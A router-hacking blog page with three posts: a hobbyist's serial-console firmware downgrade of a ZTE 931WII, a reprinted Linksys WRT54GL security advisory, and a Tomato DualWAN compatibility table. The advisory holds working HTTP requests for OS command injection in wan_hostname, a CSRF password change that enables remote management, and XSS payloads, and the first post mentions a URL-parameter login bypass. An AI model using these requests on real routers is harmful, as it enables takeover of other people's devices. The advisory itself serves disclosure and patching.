The completed adapter

The transceiver needs +5VDC operating voltage. Luckily there’s a +5V switch mode regulator stage on-board, so there’s no need to build a separate one just for the transceiver alone. I chose to tap into the supply by connecting parallel to D3, but there are plenty of other places on-board too.

Connected to the +5VDC supply..

Ok, adapter all wired up.. Hook it up with the PC, open a port connection in HyperTerm using 115k 8-n-1 and yay, bootup texts scrolling on the screen \o/.

In case you’re wondering about the enclosure looking different on the picture above than what it is at the ZTE website (and the beginning of this post) .. It’s because it is! :) Apparently, ZTE offers at least these two types of enclosure, allowing for a little bit of ISP “branding flair” or whatever. The manuals shipped with the unit have pictures of both enclosures and with a ZTE logo on it, whereas the box itself carries the ISP logo. How classy.

Hardware-wise, the box has a BCM6368 400Mhz processor, 4Mb flash and 64Mb DRAM. For WiFi, there’s a BCM4138 chip. I didn’t really want to bother with removing the RF shielding around the processor to see what else there might be underneath. The ground layer on the bottom of the board is pretty big, so the board and the shielding plate would have to be heated to extremes for removal.

Considering embedded systems as a whole.. Whereas hardware I can manage, Linux I however don’t. I do have some experience with distro installations (Debian, Ubuntu etc.) and basic command line usage, but this doesn’t really get you anywhere on a embedded system that’s optimized for a specific use. So, as you can probably imagine, ending up on the command prompt of the 931WII was somewhat a baffling moment. Steep learning curve right up ahead and all that.. :)

Luckily, hints given by friends combined with a plethora of internet searches pointed me the way. After fiddling around a while, I had a tftp server (TFTPD32) running on my laptop and was able to transfer the flash config to and from the box. The kernel is configured to automatically reboot the system after a valid config file has been uploaded, so no additional command line trickery is required for applying the new settings.

The settings themselves use some Broadcom xml markup (tags starting with X_BROADCOM_COM). I’m sure some kind of developer documentation must exist, not that I was unable to find anything from Broadcom’s online resource library. But once again, searching the net with some of the markup tags gave ideas how to go about configuring some of the settings. First tweak (of course), remove everything between the ManagementServer -tags ;).

After having my share of fun playing “the master of the system”, the first problem surfaced. No matter what parameter switches I passed to tftp, transferring the entire firmware didn’t seem to be possible. The system just kept persistently dumping/fetching the flash config! So there I was, trying to figure out what’s wrong with my tftp setup.. right about until a friend suggested that I could try starting the shell! Being used to desktop systems, I assumed shell would be running (BusyBox is mentioned on the startup texts, and all) but it actually wasn’t. No wonder the basic file system commands (like ‘cd’) were missing :D

If only someone had mentioned earlier that I'm supposed to do this.. ;)

So, after launching the BusyBox shell suddenly tftp has no problems transferring the firmware binary. No idea why it is like this (or did I do/type sth wrong?) but “yeah whatever”, as long as tftp is fully functional. The ZTE firmware binary I uploaded is of version 1.5.0c and it contains CFE bootloader and some vmlinux (2.6.21.5 kernel). The binary is available at the ZTE Finland website along with 1.5.0b. Both of these are for ISP other than mine, but they seem to work. There is 1.5.3something available here, but my box doesn’t accept this. ZTE doesn’t (at least currently) share firmware binaries with end-users, so I have no idea how much newer versions there might be.

Despite now having both the telnet and http admin interfaces accessible, what remains to be figured out is why certain ethernet connections timeout too quickly with the current firmware. This doesn’t seem to happen when using WLAN, so the problem is definitely somewhere with the LAN router settings. I tried modifying some of the nf_conntrack TCP values found under /proc/sys/net/ip4v/netfilter/, up to no avail. Not that it looks like the IP table is getting full either (as in, packets dropped). More learning curve for yours truly, so to say..

Big thanks to everyone who had enough patience to help me with Linux, it’s networking features and other related stuff! If you happen to read this and have a pdf on the Broadcom XML, I wouldn’t mind a download link in the mail. Most of the stuff in the config file seems to be accessible through the http admin interface anyway, so it’s not like my need for the documentation is critical. Call it more of a “nice-to-have” bonus ;)

The factual content ends here, but just to continue a bit on bonuses this is the “real one” of the topic..:

Only after I had the box running on the downgraded firmware, I came across some forum posts stating that the stock firmware is accessible by using the public WAN IP.. Grrrrrr, motherfuckers! If it is so, why the fuck DIDN’T HELPDESK OR THE MANUAL MENTION ABOUT THIS?

More importantly, if it is so, this also sounds like a security risk of sorts. Basically, all you’d have to know is the public IP of some subscriber using this particular CPE (f.ex. take a look at the ISP forum where they conveniently log user IPs), and you’d gain access to their router configuration in no time thanks to the very “default” admin password. Classy *2, if so.

Then again, a friend in-the-know tells me that some ISPs have certain modems that’ll give you access to admin interface from the WAN side if you simply change “login.html?success=0″ to “login.html?success=1″ on the browser address line! So yeah, maybe things could also be worse.. ;)

Read More

Linksys WRT54GL 1.1 XSS OS Injection

Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Torks ============

Shodan Search: WRT54GL
=> Results 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
=> parameter: wan_hostname
=> command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> Change the request method from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.

* For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.


POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http:///apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* reflected XSS

=> parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

* stored XSS (Access Restrictions -> Richtliniennamen eingeben (place the XSS) -> Zusammenfassung (Scriptcode gets executed)

=> parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

=> Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:


http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123">&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and give them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Send the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================

Read More

Tomato Firmware DualWAN Support Routers List

The Tomato DualWAN known to support the following equipments, wireless router devices.

Description: Support for VLAN column is Yes the WAN2 of the device can be connected to a wired network or wireless network, WAN2 for the original WAN next LAN mouth; support VLAN column N of the equipment WAN2 can only be connected to the wireless networ.

Brush non-ND version of the device list
Model	Hardware version	VLAN support	Firmware file name	Remark
Linksys WRT54GS	1.0, 2.0	Yes	WRT54GS.bin
Linksys WRT54GS	1.1	Yes	WRT54GS.bin	Click here to see the 21 floor, friends said WRT54GS V1.1 supports vlan
Linksys WRT54GS	2.1	Yes	WRT54GS.bin	Thank dosar provide information
Linksys WRT54GS	3.0, 4.0	Yes	WRT54GSv4.bin
Linksys WRT54G	1.1, 2.0, 2.1, 2.2, 3.0, 3.1, 4.0	Yes	WRT54G_WRT54GL.bin
Linksys WRT54GL	1.1	Yes	WRT54G_WRT54GL.bin	Thank the snyean provide information
Moto 850G	V2, V3	Yes	WR850G.bin
Belkin 7231-4P		Yes	Tomato.trx
DELL TrueMobile 2300	V2	Yes	Tomato.trx
Buffalo WHR-HP-G54		Yes	Tomato.trx	WAN2 port LAN1 port away from the WAN port
Buffalo WVR-G54-NF		Yes	Tomato.trx
Asus WL-300G	V1.91	Yes	Tomato.trx	WL-300G is only one LAN port, only experimental nature, do not have the practical value

Brush ND version of the device list
Model	Hardware version	VLAN support	K24 firmware	K26 firmware (R1/R2)	Remark
DualWAN WR-500U	R1.1	Yes	Tomato-ND.trx	Brush R1 edition or special edition	Support the first-line double dial, trunking, port mirroring to the force after brush special edition
DualWAN WR-500V		Yes	Does not support	Special Edition	Support the first-line double dial, trunking, port mirroring to the force after brush special edition
Asus RT-N16		Yes	Does not support	Brush R2 version
Asus RT-N12		Yes	Does not support	Brush R2 version	Need to upgrade to the Flash 8M
Asus WL-520GU		Yes	Tomato-ND.trx	Brush R1 version	Normal use of the USB 2.0 driver
Asus WL-500GP	V1, V2	Yes	Tomato-ND.trx	Brush R1 version
Asus WL-550GE		Yes	Tomato-ND.trx	Brush R1 version
Buffalo WHR-G125		Yes	Tomato-ND.trx	Brush R1 version
Buffalo WHR-G54S		Yes	Tomato-ND.trx	Brush R1 version
Belkin 8230-4		No	Tomato-ND.trx	Brush R1 version	Need to be built-in the MIMI card replaced 4306,4318
Belkin 8230-4	Brush WRTSL54GS CFE	No	WRTSL54GS.bin	Brush R1 version	Need to be built-in the MIMI card replaced 4306,4318, memory support 128M
Linksys WRH54G		Yes	Tomato-ND.trx	Brush R1 version	Flash upgrade to 4M or more memory upgrade to 16M or greater
Linksys WRT54G2		Yes	Tomato-ND.trx	Brush R1 version	Flash upgrade to 4M or more memory upgrade to 16M or greater, to thank leeanky provide information
Netcore NW 618		Yes	Tomato-ND.trx	Brush R1 version	Must be seen in the original firmware from the Web liter brush over, otherwise it may be a brick. TFTP l do not have this problem, and to flying bird thank refused to provide this information.
NetGear / NETGEAR WGR614	V6	Yes	Tomato-ND.trx	Brush R1 version, but volatile brick unknown reasons	Flash upgrade to 4M or more memory upgrade to 16M or greater, to thank leeanky provide information
Linksys WRT160N	V3	Unknown	Does not support	Brush R2 version	Flash upgrade to 8M or greater
Linksys WRT300N	V1	Unknown	Tomato-ND.trx	Brush R1 edition
Linksys WRT310N	V1	Unknown	Tomato-ND.trx	Brush R1 edition
Linksys WRT320N		Unknown	Does not support	Brush R2 version
Linksys WRT610N	V2	Unknown	Does not support	Brush R2 version	Does not support dual-band
Netgear WNR3500L		Yes	Does not support	Brush R2 version
Netgear WNR3500 v2 / U		Unknown	Does not support	Brush R2 version	Flash upgrade to 8M or greater
Netgear WNR2000 v2		Unknown	Does not support	Brush R2 version	Flash upgrade to 8M or greater

Not in the device in the list, as long as the original Tomato brush, you can brush Tomato DualWAN, if you do not support VLAN it is just WAN2 not connected to the wired network, but can be used as a wireless client access to someone else's wireless network. K24 firmware the Tomato DualWAN 1.23 (development has stopped), 1.25 (development) series has stopped, K26 firmware using Linux Kernel 2.6 kernel Series Tomato DualWAN 1.28,.

TP-Link, Mercury, D-Link, Tenda, Alpha like routers can not brush! ! !

Read More